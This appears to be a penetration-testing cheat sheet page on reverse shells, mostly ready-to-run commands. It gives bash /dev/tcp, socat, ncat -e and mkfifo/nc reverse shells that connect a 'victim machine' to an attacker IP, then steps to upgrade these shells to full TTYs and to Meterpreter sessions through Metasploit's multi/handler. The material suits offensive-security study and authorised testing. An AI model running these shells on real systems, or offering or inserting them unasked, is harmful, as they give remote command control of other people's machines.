Shells

LogoShells - LinuxHackTricks
Normal Shells
LogoFull TTYsHackTricks
Full TTY Shells

Bash

The classic bash-based reverse shell:

/bin/bash -i >& /dev/tcp/TargetIP/TargetPort 0>&1

Note: If the payload doesn't work because redirection or ampersand symbols behave weird in the vulnerable application, then base64 encoding the payload often works well.

Socat TTY Shell

Do this for a full socat shell, no need to upgrade it. You need socat installed or a socat static binary for this, though.

On kali:

socat file:`tty`,raw,echo=0 tcp-listen:4444

On the victim machine:

./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:YOUR_IP_ADDRESS_HERE:4444

Once the connection is made, you probably want to increase the terminal size (run in the reverse shell on the victim machine):

stty rows 57 cols 211

Ncat

Listen to port 8001 on attacker machine:

sudo nc -lnvp 8001

Run ncat on the victim machine:

ncat ATTACKER_IP_HERE 8001 -e /bin/bash

Note: The command is ncat, not nc or netcat. There is a difference!

Mkfifo

sh-based mkfifo reverse shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP_HERE ATTACKER_PORT_HERE >/tmp/f

Upgrading Normal Shells to TTY shells

Switch From ZSH To Bash

Warning: This doesn't work if your attacking machine uses zsh!

You can temporarily switch to bash:

exec bash --login

You can confirm you're using bash with:

ps -p $$

Upgrade the Shell Using Python

Run this in the reverse shell to upgrade it. Don't worry if your terminal turns weird temporarily.

python -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo
fg
export TERM=xterm

Upgrade the Shell Without Python

script -qc "/bin/bash -i" /dev/null
CTRL+Z
stty raw -echo
fg
export TERM=xterm

Upgrading Normal Shells to Meterpreter

Run msfconsole. Create a listener using multi/handler:

use exploit/multi/handler
set lhost YOUR_IP_ADDRESS
set lport 4444
run

Then use one of the above reverse shells to connect to the listener. Once you have the shell, press CTRL + Z to background the shell session. It will tell you the session number. Keep that in mind.

Next:

use post/multi/manage/shell_to_meterpreter
set session SESSION_NUMBER
run

Once the upgrade finishes, you'll be able to see your new session:

sessions -l

Note: There's a long-standing bug where it seems to get stuck on "Stopping exploit/multi/handler". Just press enter, it's not actually stuck.

Interact with the new session with:

sessions -i NEW_SESSION_NUMBER
PreviousPort ForwardingNextLinux Privilege Escalation

Last updated

Was this helpful?